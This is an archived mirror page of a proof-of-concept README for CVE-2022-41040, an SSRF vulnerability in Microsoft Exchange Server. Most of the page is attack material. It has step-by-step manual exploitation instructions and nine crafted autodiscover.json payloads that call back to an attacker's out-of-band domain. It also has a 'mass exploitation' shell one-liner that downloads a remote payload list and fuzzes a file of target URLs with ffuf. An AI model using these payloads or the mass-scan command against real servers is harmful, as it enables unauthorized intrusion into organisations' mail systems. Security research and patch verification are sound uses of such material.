Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-41040 PoC — Microsoft Exchange Server Elevation of Privilege Vulnerability

Source
https://github.com/kljunowsky/CVE-2022-41040-POC
Associated Vulnerability
Title:Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040)
Description:Microsoft Exchange Server Elevation of Privilege Vulnerability
Description
CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server
Readme
# CVE-2022-41040-POC
CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server

## Manual exploiation 

1. Replace `COLLABHERE` with your OOB domain - `sed 's/COLLABHERE/<oob-domain>/g`

2. Add payloads next to URLs you want to test - `echo http://target.com|unfurl format %s://%d/<payload>`

3. Visit crafted URLs

4. Check your collaborator

Payloads:
```
/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
```

## Mass exploitation

```
for url in $(curl -s https://gist.githubusercontent.com/kljunowsky/a2e8392f63fb8d7c0443f2011bce59ec/raw/7b4cabaa0dab7113b1cab00e1a2cb0c4e3c6ed06/cve-2022-41040-unfurl-payloads.txt|sed 's/COLLABHERE/<OOB-PAYLOAD>/g'); do cat targets.txt |unfurl format $url >> fuzz-ready.txt;done & ffuf -w fuzz-ready.txt -u FUZZ
```

Check your collaborator!

Happy hunting!

### Requirements
[ffuf](https://github.com/ffuf/ffuf)
Thanks [@joohoi](https://github.com/joohoi)!


[unfurl](https://github.com/tomnomnom/unfurl)
Thanks [tomnomnom](https://github.com/tomnomnom)!

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)
File Snapshot

 [4.0K]  /data/pocs/35a1d2afa7f2ddf37c613cd277ac1cc492582297
├── [ 871]  CVE-2022-41040.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →